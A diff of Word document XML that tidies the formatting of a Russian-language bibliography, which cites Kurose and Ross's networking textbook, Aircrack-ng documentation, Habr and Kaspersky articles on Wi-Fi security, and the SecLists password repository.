+        <w:t>Куроуз Дж. Ф., Росс К. В. Компьютерные сети: Нисходящий подход / пер. с англ. – 6-е изд. – М.: Эксмо, 2016. – 912 с.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Aircrack-ng. Official </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>протоколы :</w:t>
+        <w:t>Documentation :</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> учебник для вузов. – 5-е изд. – СПб</w:t>
+        <w:t xml:space="preserve"> сайт. – </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>. :</w:t>
+        <w:t>Текст :</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Питер, 2016. – 992 с.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a"/>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t>Куроуз</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Дж. Ф., Росс К. В. Компьютерные сети: Нисходящий подход / пер. с англ. – 6-е изд. – М.: Эксмо, 2016. – 912 с.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Aircrack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">-ng. Official </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Documentation :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>сайт</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. – </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Текст</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>электронный</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>. – URL: </w:t>
+        <w:t xml:space="preserve"> электронный. – URL: </w:t>
       </w:r>
       <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:history="1">
         <w:r>
@@ -5691,23 +4886,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>дата</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>обращения</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>: 20.03.2026).</w:t>
+        <w:t> (дата обращения: 20.03.2026).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5723,36 +4902,15 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>сайт</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. – </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> сайт. – </w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>Текст</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> :</w:t>
+        <w:t>Текст :</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>электронный</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>. – URL: </w:t>
+        <w:t xml:space="preserve"> электронный. – URL: </w:t>
       </w:r>
       <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
         <w:r>
@@ -5763,23 +4921,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>дата</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>обращения</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>: 20.03.2026).</w:t>
+        <w:t> (дата обращения: 20.03.2026).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5882,14 +5024,12 @@
           </w:rPr>
           <w:t>://</w:t>
         </w:r>
-        <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
           </w:rPr>
           <w:t>habr</w:t>
         </w:r>
-        <w:proofErr w:type="spellEnd"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
@@ -5910,14 +5050,12 @@
           </w:rPr>
           <w:t>/</w:t>
         </w:r>
-        <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
           </w:rPr>
           <w:t>ru</w:t>
         </w:r>
-        <w:proofErr w:type="spellEnd"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
@@ -6037,14 +5175,12 @@
           </w:rPr>
           <w:t>://</w:t>
         </w:r>
-        <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
           </w:rPr>
           <w:t>habr</w:t>
         </w:r>
-        <w:proofErr w:type="spellEnd"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
@@ -6065,14 +5201,12 @@
           </w:rPr>
           <w:t>/</w:t>
         </w:r>
-        <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
           </w:rPr>
           <w:t>ru</w:t>
         </w:r>
-        <w:proofErr w:type="spellEnd"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
@@ -6093,14 +5227,12 @@
           </w:rPr>
           <w:t>/</w:t>
         </w:r>
-        <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
           </w:rPr>
           <w:t>ruvds</w:t>
         </w:r>
-        <w:proofErr w:type="spellEnd"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
@@ -6242,14 +5374,12 @@
           </w:rPr>
           <w:t>.</w:t>
         </w:r>
-        <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
           </w:rPr>
           <w:t>kaspersky</w:t>
         </w:r>
-        <w:proofErr w:type="spellEnd"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
@@ -6257,14 +5387,12 @@
           </w:rPr>
           <w:t>.</w:t>
         </w:r>
-        <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
           </w:rPr>
           <w:t>ru</w:t>
         </w:r>
-        <w:proofErr w:type="spellEnd"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
@@ -6311,14 +5439,12 @@
           </w:rPr>
           <w:t>/</w:t>
         </w:r>
-        <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
           </w:rPr>
           <w:t>wep</w:t>
         </w:r>
-        <w:proofErr w:type="spellEnd"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
@@ -6339,14 +5465,12 @@
           </w:rPr>
           <w:t>-</w:t>
         </w:r>
-        <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="af5"/>
           </w:rPr>
           <w:t>wpa</w:t>
         </w:r>
-        <w:proofErr w:type="spellEnd"/>
       </w:hyperlink>
       <w:r>
         <w:t> </w:t>
@@ -6362,13 +5486,8 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SecLists</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. Password </w:t>
+      <w:r>
+        <w:t xml:space="preserve">SecLists. Password </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -6378,26 +5497,13 @@
       <w:r>
         <w:t xml:space="preserve"> GitHub. – </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>Текст</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> :</w:t>
+        <w:t>Текст :</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>электронный</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>. – URL: </w:t>
+        <w:t xml:space="preserve"> электронный. – URL: </w:t>
       </w:r>
       <w:hyperlink r:id="rId23" w:tgtFrame="_blank" w:history="1">
         <w:r>
@@ -6408,23 +5514,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>дата</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>обращения</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>: 20.03.2026).</w:t>
+        <w:t> (дата обращения: 20.03.2026).</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -10461,6 +9551,7 @@
   <w:style w:type="character" w:default="1" w:styleId="a8">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a9">
